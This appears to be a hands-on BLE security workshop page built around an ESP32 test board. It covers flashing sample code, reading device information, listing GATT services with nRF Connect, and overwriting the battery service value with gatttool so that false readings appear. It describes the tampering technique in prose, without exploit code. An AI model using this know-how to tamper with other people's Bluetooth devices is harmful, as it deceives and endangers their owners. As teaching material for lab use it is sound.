Home

Awesome

BLE-NullBlr

IoT Workshop - BLE - Understanding and Exploiting

Resources

Download the tools


Rules of Flashing ESP32 board from the Arduino IDE:


Challenge 1: Identify the device information


Challenge 2: understand difference between Classsic Bluetooth and BLE (Bluetooth Low Energy) Security

[Basic practical Approach use the Bluetooth General code flash into the ESP32](https://github.com/V33RU/BLE-NullBlr/blob/master/Bluetooth%20Connection%20-%20General)

Don’t forget to change the tools options according board requirements Once flash powerup the device and try connect with the mobile device Don’t try to connect with the NRF connect app and the code related basic Bluetooth not BLE Goto bluetooth settings in mobile

These will be very basic difference in security between the Classic & BLE later on Classic Bluetooth will also included the pairing and key authentication as well BLE as came more advance features in the device encryption , authentication etc, This is not exact difference this is just for an idea , Soon i will completely write difference between Classic Bluetooth and Smart BLE with Practical Example

Challenge 3: Check the Services in BLE and check for Read/Write data

    `From the 1st challenge will get to know how to get the BAddr or MAC addr of Bluetooth device Use the NRF connect app and or gatttool or any other tool which we can able to see the read and write handles will help us to do next level testing`

    `Lets start install NRF connect from play store and it is helps us see the read/write handles very easily , not only that it will give more other information as well ,like shown in image`

Scan for surrounding Bluetooth devices to

Before going to start about the 3rd challenge we need to know little depth about the BLE please the read slides in the github or study about the GAP and GATT

Flash the battery.ino (https://github.com/V33RU/BLE-NullBlr/blob/master/Ble-sec1.ino) and open the NRF connect app check for the BLE Battery

All services developed by bluetooth SIG (Special Interest Group) only so lets check the battery gatt service

Just click on the code to see more details about the code,

Once flashed it after open the NRF connect and check for what are all information is available

GATT Service of the battery, 0x18F and lets check for the read and write data

Connect to the device

Challenge 4: Try to overwrite or change the value of Service

Here we are going to use the gatttool from the terminal or we can use NRF connect as well but for me gatttool from terminal more familiar , We got to know finally read and write data of battery service , the fianl part is change the values to send wrong to data mobile notification

Lets get connect first

As we see in the NRF connect app WRITE handle 0x2a19 in the UUID value it is howing as well to usnderstand more aboutthe UUID (https://www.uuidgenerator.net/) Will help it more

Lets start handle will give yout the descriptor value and Properties will tells whether it is READ or WRITE

It is failed with when you running read request on the property of write handle this way we can confirm the read and write handles when we are not getting any information from NRF connect app

Right now we can change the values to and it will indicate different battery values if you write right one

This is just an example not exact writeup ,, all this article just educational purpose only,,

Notes: